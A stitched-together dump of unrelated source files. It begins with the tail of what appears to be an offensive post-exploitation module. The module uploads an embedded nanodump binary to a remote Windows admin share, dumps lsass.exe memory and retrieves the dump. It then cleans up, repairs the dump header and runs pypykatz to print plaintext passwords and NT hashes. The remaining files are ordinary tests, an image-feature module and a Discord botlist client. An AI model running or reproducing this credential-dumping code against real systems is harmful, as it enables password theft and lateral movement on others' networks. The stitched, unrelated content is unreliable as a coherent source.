AEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABAG1zdmNydC5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEEAAAAAAAIBCQAAAAAAAAAAAAAAAAAAAAAAAAAAAANBCQAAAAAAAoEJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")
self.nano = "nano.exe"
self.nano_path = "/tmp/shared/"
self.dir_result = self.nano_path
self.useembeded = True
if 'NANO_PATH' in module_options:
self.nano_path = module_options['NANO_PATH']
self.useembeded = False
if 'NANO_EXE_NAME' in module_options:
self.nano = module_options['NANO_EXE_NAME']
self.useembeded = False
if 'TMP_DIR' in module_options:
self.tmp_dir = module_options['TMP_DIR']
if 'DIR_RESULT' in module_options:
self.dir_result = module_options['DIR_RESULT']
def on_admin_login(self, context, connection):
if self.useembeded:
with open(self.nano_path + self.nano, 'wb') as nano:
nano.write(self.nano_embeded)
context.log.info('Copy {} to {}'.format(self.nano_path + self.nano, self.tmp_dir))
with open(self.nano_path + self.nano, 'rb') as nano:
try:
connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read)
context.log.success('Created file {} on the \\\\{}{}'.format(self.nano, self.share, self.tmp_share))
except Exception as e:
context.log.error('Error writing file to share {}: {}'.format(self.share, e))
# Get the PID of the lsass.exe process
command = 'tasklist /v /fo csv | findstr /i "lsass"'
context.log.info('Getting lsass PID {}'.format(command))
p = connection.execute(command, True)
pid = p.split(',')[1][1:-1]
command = self.tmp_dir + self.nano + ' --pid ' + pid + ' --write ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log'
context.log.info('Executing command {}'.format(command))
p = connection.execute(command, True)
context.log.debug(p)
dump = False
if 'Done' in p:
context.log.success('Process lsass.exe was successfully dumped')
dump = True
else:
context.log.error('Error dumping process lsass.exe, try again with verbose')
if dump:
regex = r"([A-Za-z0-9]*-[A-Za-z]*[0-9]+-[A-Za-z0-9]*\.log)"
p = connection.execute("dir " + self.tmp_dir, True)
context.log.debug(p)
matches = re.search(regex, str(p), re.MULTILINE)
machine_name = ''
if matches:
machine_name = matches.group()
else:
context.log.error("Error getting the lsass.dmp file name")
sys.exit(1)
context.log.info('Copy {} to host'.format(machine_name))
with open(self.dir_result + machine_name, 'wb+') as dump_file:
try:
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.dir_result + machine_name))
except Exception as e:
context.log.error('Error while getting file: {}'.format(e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + self.nano)
context.log.success('Deleted nano file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting nano file on share {}: {}'.format(self.share, e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
# Restore the minidump header that nanodump invalidates: 'MDMP' magic at offset 0, version bytes at offset 4
fh = open(self.dir_result + machine_name, "r+b")
fh.seek(0)
fh.write(b'\x4d\x44\x4d\x50')
fh.seek(4)
fh.write(b'\xa7\x93')
fh.seek(6)
fh.write(b'\x00\x00')
fh.close()
context.log.info("pypykatz lsa minidump {} --outfile {}.txt".format(self.dir_result + machine_name, self.dir_result + machine_name))
try:
context.log.info('Invoking pypykatz to extract the credentials ...')
os.system("pypykatz lsa minidump " + self.dir_result + machine_name + " --outfile " + self.dir_result + machine_name + ".txt >/dev/null 2>&1")
context.log.info("Extracted credentials:")
with open(self.dir_result + machine_name + ".txt", 'r') as outfile:
data = outfile.read()
regex = r"(?:username:? (?!NA)(?P<username>.+[^\$])\n.*domain(?:name)?:? (?P<domain>.+)\n)(?:.*password:? (?!None)(?P<password>.+)|.*\n.*NT: (?P<hash>.*))"
matches = re.finditer(regex, data, re.MULTILINE | re.IGNORECASE)
credz_bh = []
domain = ""
for match in matches:
domain = match.group("domain")
username = match.group("username")
password = match.group("password") or match.group("hash")
context.log.success(highlight(domain + "\\" + username + ":" + password))
if "." not in domain and domain.upper() in connection.domain.upper():
domain = connection.domain
credz_bh.append({'username': username.upper(), 'domain': domain.upper()})
if domain:
add_user_bh(credz_bh, domain, context.log, connection.config)
except Exception as e:
context.log.error('Error while executing pypykatz: {}'.format(e))
context.log.error('Please make sure pypykatz is installed (pip3 install pypykatz)')
0621e456138e228f2308333bfbc0da1e2f13b8ea | 6,244 | py | Python | backend/app/tests/functional/test_datarooms.py | saschajullmann/sedotra | aaa38f6d533daa725a7037a8c446da978ffafa7d | [
"MIT"
] | null | null | null | backend/app/tests/functional/test_datarooms.py | saschajullmann/sedotra | aaa38f6d533daa725a7037a8c446da978ffafa7d | [
"MIT"
] | null | null | null | backend/app/tests/functional/test_datarooms.py | saschajullmann/sedotra | aaa38f6d533daa725a7037a8c446da978ffafa7d | [
"MIT"
] | null | null | null | import uuid
from fastapi.testclient import TestClient
from sqlalchemy.orm import Session
from app.core.config import settings
from app.models.dataroom_role import DataRoomRole
from tests.fixtures.role_data import Data
from tests.utils.auth_header import create_access_header
def test_get_rooms_in_org(
client: TestClient,
data: Data,
) -> None:
"""
This test checks whether certain kinds of users can access
the endpoint that lists all the datarooms in a given org.
"""
# Make sure a user who is a member of the org can list rooms
auth_header = create_access_header(data.member_user_org_1)
response = client.get(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms",
headers=auth_header,
)
assert response.status_code == 200
# Make sure the same user cannot access the list rooms endpoint
# for a random org.
rand_uuid = uuid.uuid4()
response = client.get(
f"{settings.API_V1_STR}/orgs/{rand_uuid}/datarooms",
headers=auth_header,
)
assert response.status_code == 404
# Make sure a guest user with only access to a specific room cannot
# access the list rooms endpoint for the entire org
auth_header = create_access_header(data.guest_read_user_room_1)
response = client.get(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms",
headers=auth_header,
)
assert response.status_code == 400
def test_create_room(
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking whether certain kinds of
users can create datarooms under a given org.
"""
# Make sure a user who is a member of the org can create rooms
auth_header = create_access_header(data.member_user_org_1)
new_room_request = {"name": "MyNewRoom", "description": "Brand new description."}
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms",
headers=auth_header,
json=new_room_request,
)
assert response.status_code == 200
json_response = response.json()
assert "name" in json_response
assert "description" in json_response
assert "id" in json_response
# Make sure a user from one org cannot create a dataroom in a second org
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.second_org.id}/datarooms",
headers=auth_header,
json=new_room_request,
)
assert response.status_code == 403
def test_create_update_and_delete_room_user_roles(
db: Session,
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking the ability
to create, update and delete user roles for a dataroom
"""
auth_header = create_access_header(data.admin_user_room_1)
new_room_role_request = {
"user_id": str(data.member_user_2_org_1.id),
"user_role": "MEMBER",
}
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_1.id}/user_roles",
headers=auth_header,
json=new_room_role_request,
)
assert response.status_code == 201
role = (
db.query(DataRoomRole)
.filter_by(user_id=new_room_role_request["user_id"], dataroom_id=data.room_1.id)
.first()
)
assert role
assert role.name == new_room_role_request["user_role"]
update_room_role_request = {
"user_id": str(data.member_user_2_org_1.id),
"user_role": "ADMIN",
}
response = client.patch(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_1.id}/user_roles/{role.id}",
headers=auth_header,
json=update_room_role_request,
)
assert response.status_code == 200
role = (
db.query(DataRoomRole)
.filter_by(
user_id=update_room_role_request["user_id"], dataroom_id=data.room_1.id
)
.first()
)
assert role
assert role.name == update_room_role_request["user_role"]
response = client.delete(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_1.id}/user_roles/{role.id}",
headers=auth_header,
)
assert response.status_code == 200
def test_create_update_and_delete_room_team_roles(
db: Session,
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking the ability
to create, update and delete team roles for a dataroom
"""
auth_header = create_access_header(data.admin_user_room_2)
new_room_role_request = {
"team_id": str(data.team_1.id),
"team_role": "MEMBER",
}
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_2.id}/team_roles",
headers=auth_header,
json=new_room_role_request,
)
assert response.status_code == 201
role = (
db.query(DataRoomRole)
.filter_by(team_id=new_room_role_request["team_id"], dataroom_id=data.room_2.id)
.first()
)
assert role
assert role.name == new_room_role_request["team_role"]
update_room_role_request = {
"team_id": str(data.team_1.id),
"team_role": "ADMIN",
}
response = client.patch(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_2.id}/team_roles/{role.id}",
headers=auth_header,
json=update_room_role_request,
)
assert response.status_code == 200
role = (
db.query(DataRoomRole)
.filter_by(
team_id=update_room_role_request["team_id"], dataroom_id=data.room_2.id
)
.first()
)
assert role
assert role.name == update_room_role_request["team_role"]
response = client.delete(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_2.id}/team_roles/{role.id}",
headers=auth_header,
)
assert response.status_code == 200
role = (
db.query(DataRoomRole)
.filter_by(
team_id=update_room_role_request["team_id"], dataroom_id=data.room_2.id
)
.first()
)
assert role is None
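The tests above all rely on `create_access_header` from `tests.utils.auth_header`, which isn't shown in this file. A minimal sketch of such a helper, where the `token_factory` parameter is an assumption standing in for the project's real token-signing function:

```python
def create_access_header(user, token_factory):
    """Build the Authorization header the test client sends.

    `token_factory` is a stand-in for the real access-token creation
    function (e.g. one that signs a JWT for `user.id`); it is an
    assumption, not the project's actual API.
    """
    token = token_factory(str(user.id))
    return {"Authorization": "Bearer " + token}
```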
064d690452034468a919d9c59ad6be3f663872c9 | 170 | py | Python | navigator/auth/authorizations/__init__.py | phenobarbital/navigator-api | 15a0336b570ec861bdcc9c225e6f1b5684900a9d | [
"Apache-2.0",
"BSD-3-Clause"
] | 10 | 2020-07-27T03:33:20.000Z | 2022-02-18T21:25:49.000Z | navigator/auth/authorizations/__init__.py | webclinic017/navigator-api | d5844339c3127be77db0ee38aa7b833633e34075 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2020-09-07T15:20:54.000Z | 2021-05-28T00:56:45.000Z | navigator/auth/authorizations/__init__.py | webclinic017/navigator-api | d5844339c3127be77db0ee38aa7b833633e34075 | [
"Apache-2.0",
"BSD-3-Clause"
] | 3 | 2020-07-27T07:36:45.000Z | 2021-09-26T18:36:34.000Z | """Authorization Middlewares for Navigator."""
from .hosts import authz_hosts
from .allow_hosts import authz_allow_hosts
__all__ = ["authz_hosts", "authz_allow_hosts"]
0651ae5aada87e2a96994515698f86e5e6738419 | 1,899 | py | Python | tests/search/test_basic.py | jaebradley/python_problems | 24b8ecd49e3095f5c607906cb36019b9e865a20f | [
"MIT"
] | null | null | null | tests/search/test_basic.py | jaebradley/python_problems | 24b8ecd49e3095f5c607906cb36019b9e865a20f | [
"MIT"
] | 5 | 2017-08-25T20:43:16.000Z | 2019-10-18T16:49:43.000Z | tests/search/test_basic.py | jaebradley/python_problems | 24b8ecd49e3095f5c607906cb36019b9e865a20f | [
"MIT"
] | null | null | null | """
Unit Test for search.basic problems
"""
from unittest import TestCase
from search.basic import recursive_dfs, iterative_dfs
class TestRecursiveDepthFirstSearch(TestCase):
"""
Unit Test for recursive Depth First Search implementation
"""
def test_searching_returns_nodes(self):
"""Test returns expected nodes"""
graph = {'A': {'B', 'C'},
'B': {'A', 'D', 'E'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(recursive_dfs(graph=graph, start='A'), {'A', 'B', 'C', 'D', 'E', 'F'})
def test_searching_cycle_returns_cycle_nodes(self):
"""Test returns nodes in cycle"""
graph = {'A': {'B', 'C'},
'B': {'D'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(recursive_dfs(graph=graph, start='B'), {'B', 'D'})
class TestIterativeDepthFirstSearch(TestCase):
"""
Unit Test for iterative Depth First Search implementation
"""
def test_searching_returns_nodes(self):
"""Test returns expected nodes"""
graph = {'A': {'B', 'C'},
'B': {'A', 'D', 'E'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(iterative_dfs(graph=graph, start='A'), {'A', 'B', 'C', 'D', 'E', 'F'})
def test_searching_cycle_returns_cycle_nodes(self):
"""Test returns nodes in cycle"""
graph = {'A': {'B', 'C'},
'B': {'D'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(iterative_dfs(graph=graph, start='B'), {'B', 'D'})
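These tests import `recursive_dfs` and `iterative_dfs` from `search.basic`, which isn't shown here. A minimal iterative implementation consistent with the expected node sets above (a sketch, not the project's actual code) could be:

```python
def iterative_dfs(graph, start):
    """Depth-first traversal returning the set of nodes reachable from start."""
    visited, stack = set(), [start]
    while stack:
        node = stack.pop()
        if node not in visited:
            visited.add(node)
            # Push only neighbors we have not seen yet
            stack.extend(graph[node] - visited)
    return visited
```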
88cdbda6ec61e92bf42cbbfc5ad3e0d8ffd43392 | 11,263 | py | Python | siftmodel/codebook.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-10-16T07:37:46.000Z | 2020-10-04T10:31:02.000Z | siftmodel/codebook.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 3 | 2021-03-19T00:22:56.000Z | 2022-01-13T01:12:35.000Z | siftmodel/codebook.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-06-04T10:58:39.000Z | 2019-06-06T18:52:01.000Z | import numpy as np
from neupy import algorithms, utils, storage
import h5py
import glob
import cv2 as cv
from siftmodel.sift import *
from utils import *
import pickle
def on_epoch_end(self, optimizer):
# Epoch-end callback (hooked via `signals=`) that reports progress and reloads checkpointed weights
print("Last epoch: {}".format(optimizer.last_epoch))
storage.load(optimizer, filepath='file.hdf5')
class Som_iam:
def __init__(self,config_file_path):
config_file = open(config_file_path, "r")
# Array of configurations (read here but not otherwise used)
config = config_file.read().split(',')
self.descriptors = None
self.sofm = None
self.data = None
# load descriptors if already done before
def load_descriptors(self,filename):
with open(filename, 'rb') as input:
self.descriptors = pickle.load(input)
def init_sofm(self,lr=0.5):
self.sofm = algorithms.SOFM(n_inputs=128,n_outputs=300,step=lr,learning_radius=0,weight='init_pca',shuffle_data=True,verbose =True)
with open('sofm_iam.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def read_sofm(self):
with open('sofm_iam.pkl', 'rb') as input:
self.sofm = pickle.load(input)
def train_sofm(self,data,ep=1):
self.sofm.train(data,epochs=ep)
with open('sofm_iam.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def generate_codebook(self,sofm):
centers=(sofm.weight).transpose()
with open('centers_iam.pkl', 'wb') as output:
pickle.dump(centers, output, pickle.HIGHEST_PROTOCOL)
print(centers)
print("centers shape is:", centers.shape)
def read_codebook(self):
with open('centers_iam.pkl', 'rb') as input:
centers = pickle.load(input)
return centers
# def codebook_generation(self,num_batches, sofm, epoch):
#
# if (sofm is None):
# sofm = algorithms.SOFM(n_inputs=128,
# n_outputs=300,
# step=0.5,
# learning_radius=0,
# signals=on_epoch_end
# )
#
# with h5py.File('Datasets/SDpoints0.h5', 'r') as hf:
# data = hf['keypoints-batch'][:]
# for x in range(1, int(num_batches) + 1):
# with h5py.File('Datasets/SDpoints0.h5', 'r') as hf:
# data = np.append(data, hf['keypoints-batch'][:], axis=0)
# sofm.train(data, epochs=int(epoch))
# def data_preprocessor(self):
# sift = Sift()
# with open("Output.txt", 'w') as out:
# out.write("")
# batch_num = 0
# SDpoints = np.zeros((1, 128))
# for filename in glob.glob('WordsDatabase/*/*/*.png'):
# temp = sift.get_des(cv.imread(filename))
# if temp is not None:
# SDpoints = np.append(SDpoints, temp, axis=0)
# if SDpoints.shape[0] > 40000:
# SDpoints = np.delete(SDpoints, (0), axis=0)
# # SDpoints, _,_ = feature_normalize(SDpoints)
# with h5py.File('Datasets/SDpoints' + str(batch_num) + '.h5', 'w') as hf:
# hf.create_dataset("keypoints-batch", data=SDpoints)
#
# with open("Output.txt", 'a') as out:
# out.write(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# # print(str(batch_num) + " " +filename + " " + str(SDpoints.shape[0]) + "\n")
# batch_num += 1
# SDpoints = np.zeros((1, 128))
# with h5py.File('Datasets/SDpoints' + str(batch_num) + '.h5', 'w') as hf:
# hf.create_dataset("keypoints-batch", data=SDpoints)
#
# with open("Output.txt", 'a') as out:
# out.write(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# print(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# batch_num += 1
def normalize(self):
with open("stats.txt", 'w') as out:
out.write("")
SDpoints = np.zeros((1, 128))
SDpointsFinal = np.zeros((1, 128))
for x in range(0, 244):
print(x)
with h5py.File('Datasets/SDpoints' + str(x) + '.h5', 'r') as hf:
SDpoints = np.append(SDpoints, hf['keypoints-batch'][:], axis=0)
if (x % 50 == 0):
SDpoints = np.delete(SDpoints, (0), axis=0)
SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
print(SDpointsFinal.shape)
SDpoints = np.zeros((1, 128))
SDpoints = np.delete(SDpoints, (0), axis=0)
SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
SDpoints = np.zeros((1, 128))
# print(SDpointsFinal.shape)
SDpointsFinal = np.delete(SDpointsFinal, (0), axis=0)
# SDpointsFinal, mean,dev = feature_normalize(SDpointsFinal)
mean = np.mean(SDpointsFinal, axis=0)
print(SDpointsFinal)
mean = mean.reshape((1, 128))
print(SDpointsFinal.transpose().shape, SDpointsFinal.shape)
normalized_X = SDpointsFinal - mean
print(normalized_X.shape)
deviation = np.sqrt(np.var(normalized_X, axis=0))
normalized_X = np.divide(normalized_X, deviation)
with open("stats.txt", 'a') as out:
out.write("Mean: " + str(mean) + " \nDev: " + str(deviation))
with h5py.File('Datasets/AData.h5', 'w') as hf:
hf.create_dataset("keypoints-batch", data=normalized_X)
class Som_KHATT:
def __init__(self,new = True):
self.descriptors = None
self.load_descriptors()
print(self.descriptors.shape)
self.sofm = None
self.centers = None
if new:
self.init_sofm()
else:
self.read_sofm()
print(self.sofm)
# load descriptors if already done before
def load_descriptors(self,filename = 'C:/Users/omars/Documents/Github/LIWI/Datasets/KHATT/AData.h5' ):
with h5py.File(filename, 'r') as hf:
self.descriptors = hf['keypoints-batch'][:]
def init_sofm(self,lr=0.5):
self.sofm = algorithms.SOFM(n_inputs=128,n_outputs=300,step=lr,learning_radius=0,weight='sample_from_data',shuffle_data=True,verbose =True)
with open('sofm_KHATT1.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def read_sofm(self):
with open('sofm_KHATT.pkl', 'rb') as input:
self.sofm = pickle.load(input)
def train_sofm(self,ep=1):
self.sofm.train(self.descriptors,epochs=ep)
with open('sofm_KHATT.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def generate_codebook(self):
self.centers=(self.sofm.weight).transpose()
with open('centers_KHATT.pkl', 'wb') as output:
pickle.dump(self.centers, output, pickle.HIGHEST_PROTOCOL)
print(self.centers)
print("centers shape is:", self.centers.shape)
def read_codebook(self):
with open('centers_KHATT.pkl', 'rb') as input:
self.centers = pickle.load(input)
def train_loop(self,ep=1):
self.train_sofm(ep)
self.generate_codebook()
    def normalize(self):
        with open("stats.txt", 'w') as out:
            out.write("")
        SDpoints = np.zeros((1, 128))
        SDpointsFinal = np.zeros((1, 128))
        for x in range(0, 244):
            print(x)
            with h5py.File('Datasets/SDpoints' + str(x) + '.h5', 'r') as hf:
                SDpoints = np.append(SDpoints, hf['keypoints-batch'][:], axis=0)
            if x % 50 == 0:
                SDpoints = np.delete(SDpoints, (0), axis=0)
                SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
                print(SDpointsFinal.shape)
                SDpoints = np.zeros((1, 128))
        SDpoints = np.delete(SDpoints, (0), axis=0)
        SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
        SDpoints = np.zeros((1, 128))
        # print(SDpointsFinal.shape)
        SDpointsFinal = np.delete(SDpointsFinal, (0), axis=0)
        # SDpointsFinal, mean, dev = feature_normalize(SDpointsFinal)
        mean = np.mean(SDpointsFinal, axis=0)
        print(SDpointsFinal)
        mean = mean.reshape((1, 128))
        print(SDpointsFinal.transpose().shape, SDpointsFinal.shape)
        normalized_X = SDpointsFinal - mean
        print(normalized_X.shape)
        deviation = np.sqrt(np.var(normalized_X, axis=0))
        normalized_X = np.divide(normalized_X, deviation)
        with open("stats.txt", 'a') as out:
            out.write("Mean: " + str(mean) + " \nDev: " + str(deviation))
        with h5py.File('Datasets/AData.h5', 'w') as hf:
            hf.create_dataset("keypoints-batch", data=normalized_X)
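The normalize method above builds one large matrix of 128-dimensional SIFT descriptors and applies z-score normalization: subtract the per-column mean, then divide by the per-column standard deviation. A minimal self-contained sketch of just that computation (the `feature_normalize` name mirrors the commented-out helper above; the h5py plumbing and file paths are omitted):

```python
import numpy as np

def feature_normalize(X):
    """Z-score normalize each column of X, mirroring the math in normalize()."""
    mean = np.mean(X, axis=0)                       # per-feature mean, shape (n_features,)
    centered = X - mean                             # broadcast subtraction
    deviation = np.sqrt(np.var(centered, axis=0))   # per-feature standard deviation
    return centered / deviation, mean, deviation

X = np.array([[1.0, 10.0],
              [3.0, 30.0]])
Xn, mean, dev = feature_normalize(X)
# each column of Xn now has zero mean and unit variance
```

Note that `np.var` here uses the population variance (ddof=0), which matches the computation in `normalize` above.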
# ---- dbleupy/__init__.py (itsflorent/python-library, MIT) ----
import requests
import json
from requests import api


class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def dbleu_postservercount(apikey=None, servercount=None, log_disable=None):
    if apikey is None and servercount is None:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY & ServerCount missing find more on https://pypi.org/project/dbleupy/ - ./dbleu_postservercount" + bcolors.ENDC)
        return
    if apikey is None:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
        return
    if servercount is None:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: ServerCount missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
        return
    try:
        guilds = len(servercount.guilds)
        r = requests.patch('https://api.discord-botlist.eu/v1/update', headers={
            "Authorization": f"Bearer {apikey}"
        }, json={"serverCount": guilds})
        if r.status_code == 400:
            if not log_disable:
                print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: 400 - Please check your API key. Access denied." + bcolors.ENDC)
            return
        if r.status_code == 200:
            if not log_disable:
                print(bcolors.OKGREEN + f"[API] discord-botlist.eu HTTP: 200 - Posted server count ({guilds})" + bcolors.ENDC)
            return
        else:
            content = json.loads(r.content.decode("utf-8"))
            if not log_disable:
                print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: {r.status_code} - {content['message']}" + bcolors.ENDC)
            return
    except Exception:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: Please check your bot's data (bot or self.bot)" + bcolors.ENDC)
        return


def dbleu_getbotvotes(apikey=None, log_disable=None):
    if apikey is None:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
        return
    r = requests.get('https://api.discord-botlist.eu/v1/votes', headers={"Authorization": f"Bearer {apikey}"})
    if r.status_code == 400:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: 400 - Please check your API key. Access denied." + bcolors.ENDC)
        return
    if r.status_code == 200:
        print(bcolors.OKGREEN + f"[API] discord-botlist.eu HTTP: {r.status_code}" + bcolors.ENDC)
        return r
    else:
        content = json.loads(r.content.decode("utf-8"))
        if not log_disable:
            print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: {r.status_code} - {content['message']}" + bcolors.ENDC)
        return


def dbleu_getbotdata(apikey=None, log_disable=None):
    if apikey is None:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
        return
    r = requests.get('https://api.discord-botlist.eu/v1/ping', headers={"Authorization": f"Bearer {apikey}"})
    if r.status_code == 400:
        if not log_disable:
            print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: 400 - Please check your API key. Access denied." + bcolors.ENDC)
        return
    if r.status_code == 200:
        print(bcolors.OKGREEN + f"[API] discord-botlist.eu HTTP: {r.status_code}" + bcolors.ENDC)
        return r
    else:
        content = json.loads(r.content.decode("utf-8"))
        if not log_disable:
            print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: {r.status_code} - {content['message']}" + bcolors.ENDC)
        return
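Every error branch above decodes the raw response body the same way: `r.content` is decoded as UTF-8 and parsed with `json.loads` to pull out the API's `message` field. That repeated pattern can be factored into a helper; `extract_message` is a hypothetical name (not part of dbleupy), and the byte string below stands in for a real `r.content`:

```python
import json

def extract_message(raw):
    """Decode a response body and return its 'message' field,
    mirroring the repeated content.decode()/json.loads() pattern above."""
    content = json.loads(raw.decode("utf-8"))
    return content["message"]

# fake payload standing in for requests' r.content
payload = b'{"message": "Rate limit exceeded"}'
msg = extract_message(payload)
```

(With requests one could also call `r.json()` directly, which performs the same decode-and-parse step.)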
# ---- akData/format/__init__.py (adamkerz/akData, BSD-3-Clause) ----
from . import boolean
from . import number
from . import datetime
from . import phoneNumber
